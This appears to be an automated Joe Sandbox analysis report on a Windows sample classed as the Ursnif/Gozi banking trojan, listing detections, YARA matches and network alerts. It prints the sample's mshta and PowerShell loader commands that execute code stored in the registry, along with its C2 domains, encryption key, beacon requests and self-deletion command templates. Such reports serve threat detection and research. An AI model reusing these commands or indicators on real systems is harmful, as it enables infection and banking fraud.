Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
main.exe

Overview

General Information

Sample Name:main.exe
Analysis ID:747122
MD5:9676298f24c8cdd4b532ac027a00f60e
SHA1:8d0bd57712533f1a889627706925c17ed4347ce5
SHA256:0f5cce66023859e9d7e3f54b78e95bf09618db5ed01fe05b765d76ab156271da
Tags:exe
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Machine Learning detection for sample
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • main.exe (PID: 6012 cmdline: C:\Users\user\Desktop\main.exe MD5: 9676298F24C8CDD4B532AC027A00F60E)
  • mshta.exe (PID: 2388 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 2620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "KM4KfwF73On87ceOJ9C2qHA1QYSJrKVcR1KPnCm64Rx18WdAv584/Fs7DjMWYA/P92CAZYLAmytpZxp/RUvoj4/shhReMB6+wc57XoABX3Y0RTLurW+xvOfXvhoVt46kfhqgitXVx8sdl+8o5SWuWu/7y9YXZTozHNudRTtITJp+QgPs3R5xHIQ+aiBIETSDpVUrU/tgk8bgic8LYQR02koGQgfYQZ2WQVvln9h0ldn8sklFhg+72/pBq0oc+h+HaRe4+quL+YBvG8dNVk8BoWLm/5ksmoLonANz0fig28/A3KHH0bpe4IyikjMzDALCOhzXxje1SeKcm1NpUkiB7R5Zlpm58DDCabZt3zMLEyU=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "5", "server": "50", "serpent_key": "Qk6vKwBtCjaLJ4zv", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0xff0:$a1: /C ping localhost -n %u && del "%s"
      • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xca8:$a5: filename="%.4u.%lu"
      • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe72:$a9: &whoami=%s
      • 0xe5a:$a10: %u.%u_%u_%u_x%u
      • 0xc22:$a11: size=%u&hash=0x%08x
      • 0xc13:$a12: &uptime=%u
      • 0xda7:$a13: %systemroot%\system32\c_1252.nls
      • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 38 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.main.exe.6d0000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        0.2.main.exe.cb94a0.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          0.3.main.exe.14294a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            0.3.main.exe.1455948.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              0.3.main.exe.13aa4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                Click to see the 3 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.3134.0.118.20349698802033203 11/16/22-02:14:48.026105
                SID:2033203
                Source Port:49698
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3134.0.118.20349698802033204 11/16/22-02:14:48.026105
                SID:2033204
                Source Port:49698
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: main.exeVirustotal: Detection: 61%Perma Link
                Antivirus / Scanner detection for submitted sample
                Source: main.exeAvira: detected
                Machine Learning detection for sample
                Source: main.exeJoe Sandbox ML: detected
                Source: 0.2.main.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                Source: 0.0.main.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
                Source: main.exeMalware Configuration Extractor: Ursnif {"RSA Public Key": "KM4KfwF73On87ceOJ9C2qHA1QYSJrKVcR1KPnCm64Rx18WdAv584/Fs7DjMWYA/P92CAZYLAmytpZxp/RUvoj4/shhReMB6+wc57XoABX3Y0RTLurW+xvOfXvhoVt46kfhqgitXVx8sdl+8o5SWuWu/7y9YXZTozHNudRTtITJp+QgPs3R5xHIQ+aiBIETSDpVUrU/tgk8bgic8LYQR02koGQgfYQZ2WQVvln9h0ldn8sklFhg+72/pBq0oc+h+HaRe4+quL+YBvG8dNVk8BoWLm/5ksmoLonANz0fig28/A3KHH0bpe4IyikjMzDALCOhzXxje1SeKcm1NpUkiB7R5Zlpm58DDCabZt3zMLEyU=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "5", "server": "50", "serpent_key": "Qk6vKwBtCjaLJ4zv", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_006D47E5
                Source: main.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49698 -> 134.0.118.203:80
                Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49698 -> 134.0.118.203:80
                Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                Source: global trafficHTTP traffic detected: GET /uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache
                Source: powershell.exe, 0000000F.00000002.527605554.00000265C03F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iujdhsndjfks.ru/
                Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QT
                Source: main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuH
                Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS
                Source: main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/
                Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 0000000F.00000002.508025334.00000265A80B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 0000000F.00000002.524619669.00000265A9BE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: unknownDNS traffic detected: queries for: lentaphoto.at
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D4F4B ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,0_2_006D4F4B
                Source: global trafficHTTP traffic detected: GET /uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: iujdhsndjfks.ruConnection: Keep-AliveCache-Control: no-cache

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: main.exe, 00000000.00000002.505909636.0000000000788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_006D47E5

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 2620, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Writes or reads registry keys via WMI
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
